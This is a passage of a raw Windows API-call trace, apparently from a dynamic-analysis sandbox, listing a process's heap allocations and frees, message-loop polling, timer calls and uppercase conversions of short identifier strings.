RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.370] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0188.370] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0188.370] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0188.370] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0188.370] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0188.370] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.371] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.371] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.371] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.372] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.372] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.372] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.372] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.372] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.373] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.373] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0188.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0188.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0188.377] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.377] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.377] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.377] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.378] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.378] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.378] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.380] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.380] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.380] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x25c0000, 